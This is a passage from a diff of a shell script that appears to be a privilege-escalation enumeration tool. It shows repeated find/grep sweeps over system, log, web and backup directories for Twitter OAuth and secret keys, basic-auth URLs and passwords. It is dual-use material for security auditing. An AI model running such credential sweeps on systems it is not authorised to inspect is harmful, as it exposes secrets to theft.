'/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Twitter Oauth (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +print_3title_no_nl "Searching Twitter Oauth (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Twitter Secret Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +print_3title_no_nl "Searching Twitter Secret Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait echo '' print_2title "Searching Misc" -print_3title "Searching Basic Auth (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +print_3title_no_nl "Searching Basic Auth (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Passwords1 (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +print_3title_no_nl "Searching Passwords1 (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f 